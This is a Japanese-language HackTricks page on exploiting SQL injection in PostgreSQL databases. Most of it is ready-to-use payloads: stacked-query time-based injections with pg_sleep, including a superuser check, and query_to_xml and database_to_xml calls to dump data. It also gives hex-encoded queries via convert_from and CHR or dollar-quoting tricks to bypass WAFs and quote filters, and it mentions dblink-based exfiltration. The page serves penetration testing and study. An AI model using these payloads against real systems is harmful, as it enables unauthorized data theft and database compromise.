PostgreSQL injection

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE) GCPハッキングを学び、実践する: HackTricks Training GCP Red Team Expert (GRTE)

HackTricksをサポートする

サブスクリプションプランを確認してください！
**💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
ハッキングのトリックを共有するには、HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してください。

ハッキングキャリアに興味があり、ハッキング不可能なものをハッキングしたい方 - 私たちは採用しています！ (流暢なポーランド語の読み書きが必要です)。

Careers | stmcyber.com | penetration testingstmcyber.com

このページは、PostgreSQLデータベースで見つかったSQLインジェクションを悪用するのに役立つさまざまなトリックを説明することを目的としています。また、 https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md で見つけられるトリックを補完します。

ネットワークインタラクション - 権限昇格、ポートスキャナー、NTLMチャレンジレスポンスの開示とエクスフィルトレーション

**PostgreSQLモジュールdblink**は、他のPostgreSQLインスタンスに接続し、TCP接続を実行する機能を提供します。これらの機能は、COPY FROM機能と組み合わせることで、権限昇格、ポートスキャン、NTLMチャレンジレスポンスのキャプチャなどのアクションを可能にします。これらの攻撃を実行する詳細な方法については、これらの攻撃を実行する方法を確認してください。

dblinkと大きなオブジェクトを使用したエクスフィルトレーションの例

この例を読むと、大きなオブジェクト内にデータをロードし、その後、dblink_connect関数のユーザー名内の大きなオブジェクトの内容をエクスフィルトレーションする方法のCTF例を確認できます。

PostgreSQL攻撃: 読み書き、RCE、権限昇格

ホストを侵害し、PostgreSQLから権限を昇格させる方法を確認してください:

5432,5433 - Pentesting Postgresql

WAFバイパス

PostgreSQL文字列関数

文字列を操作することで、WAFやその他の制限をバイパスするのに役立ちます。 このページでは、いくつかの便利な文字列関数を見つけることができます。

スタッククエリ

PostgreSQLはスタッククエリをサポートしていますが、2つのレスポンスが返されるとエラーをスローするアプリケーションがいくつかあります。しかし、時間インジェクションを介してスタッククエリを悪用することはまだ可能です:

id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -

XMLトリック

query_to_xml

この関数は、すべてのデータをXML形式で1つのファイルに返します。大量のデータを1行でダンプしたい場合に最適です：

SELECT query_to_xml('select * from pg_user',true,true,'');

database_to_xml

この関数は、データベース全体をXML形式で1行にダンプします（データベースが非常に大きい場合は注意してください。DoS攻撃を引き起こす可能性がありますし、クライアントにも影響を与えるかもしれません）：

SELECT database_to_xml(true,true,'');

Strings in Hex

もしクエリを文字列の中に渡して実行できるなら（例えば**query_to_xml**関数を使用する場合）、convert_fromを使用して文字列を16進数として渡し、この方法でフィルターをバイパスできます:

select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');

# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h

# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -

禁止された引用符

ペイロードに引用符を使用できない場合、基本的な句のために CHR を使用してこれを回避できます（文字の連結は、SELECT、INSERT、DELETEなどの基本的なクエリにのみ機能します。すべてのSQLステートメントには機能しません）：

SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);

または $ を使用します。このクエリは同じ結果を返します:

SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;

もしあなたがハッキングキャリアに興味があり、ハッキング不可能なものをハッキングしたいなら - 私たちは採用しています！（流暢なポーランド語の読み書きが必要）。

Careers | stmcyber.com | penetration testingstmcyber.com

AWSハッキングを学び、実践する：HackTricks Training AWS Red Team Expert (ARTE) GCPハッキングを学び、実践する：HackTricks Training GCP Red Team Expert (GRTE)

HackTricksをサポートする

サブスクリプションプランを確認してください！
**💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
ハッキングのトリックを共有するために、HackTricksとHackTricks CloudのGitHubリポジトリにPRを提出してください。

PreviousCypher Injection (neo4j)Nextdblink/lo_import data exfiltration

Last updated 1 month ago